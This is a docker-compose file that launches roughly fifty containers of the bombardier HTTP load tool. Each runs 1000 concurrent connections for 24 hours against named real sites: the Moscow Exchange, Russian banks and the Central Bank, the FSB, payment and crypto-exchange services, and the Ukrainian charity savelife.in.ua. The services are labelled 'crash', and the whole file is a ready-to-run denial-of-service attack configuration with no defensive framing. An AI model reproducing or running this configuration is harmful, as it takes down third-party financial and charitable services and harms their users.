
services:
  crash1:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.moex.com"
  crash2:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://178.248.236.218"
  crash3:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://178.248.236.218:77"
  crash4:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://194.247.132.130:77"
  crash5:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://194.247.132.130:443"
  crash6:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://yoomoney.ru"
  crash7:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://qiwi.com"
  crash8:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.tinkoff.ru"
  crash9:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://mironline.ru"
  crash10:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://belkart.by"
  crash11:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.rsb.ru"
  crash12:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.vtb.ru"
  crash13:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://alfabank.ru"
  crash14:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.sberbank.ru"
  crash15:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.rncb.ru"
  crash16:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.gazprombank.ru"
  crash17:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.pochtabank.ru"
  crash18:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://cbr.ru"
  crash19:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.bspb.ru"
  crash20:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.ubrr.ru"
  crash21:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://raiffeisen.ru"
  crash22:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.bestchange.ru/tether-trc20-to-visa-mastercard-euro.html"
  crash23:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://savelife.in.ua"   
  crash24:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://www.fsb.ru/"
  crash25:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://cleanbtc.ru/"
  crash26:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://changer.club"
  crash27:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://superchange.net"  
  crash28:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://mine.exchange"  
  crash29:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://mine.exchange"  
  crash30:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://platov.co"
  crash31:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://ww-pay.net"
  crash32:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://delets.cash"  
  crash33:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://betatransfer.org/"
  crash34:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://ramon.money "
  crash35:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://coinpaymaster.com"
  crash36:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://bitokk.biz"
  crash40:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.netex24.net"
  crash41:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://cashbank.pro"     
  crash42:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://flashobmen.com"
  crash43:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://abcobmen.com"
  crash44:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://ychanger.net"
  crash45:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://multichange.net"
  crash46:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://24paybank.ne"
  crash47:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://royal.cash"
  crash48:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://prostocash.com"
  crash49:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://baksman.org"  
  crash50:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://kupibit.me"
  crash51:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://abcobmen.com"
  crash52:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://ddos-hohlov.vercel.app"
